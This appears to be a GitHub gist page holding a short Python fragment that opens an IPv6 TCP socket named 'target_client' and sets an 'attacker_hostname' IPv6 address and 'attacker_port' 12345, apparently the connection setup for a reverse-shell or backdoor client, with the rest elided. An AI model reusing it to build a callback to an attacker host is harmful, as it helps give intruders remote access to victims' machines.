Skip to content

Instantly share code, notes, and snippets.

@NimishMishra
Created June 30, 2020 05:01
Show Gist options
  • Save NimishMishra/93a32315f5f55f2909f48f4910d2e5fb to your computer and use it in GitHub Desktop.
Save NimishMishra/93a32315f5f55f2909f48f4910d2e5fb to your computer and use it in GitHub Desktop.
target_client = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
.
.
.
attacker_hostname = "2405:204:a38a:708d:4dfd:c0ac:2ba2:3a06"
attacker_port = 12345
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment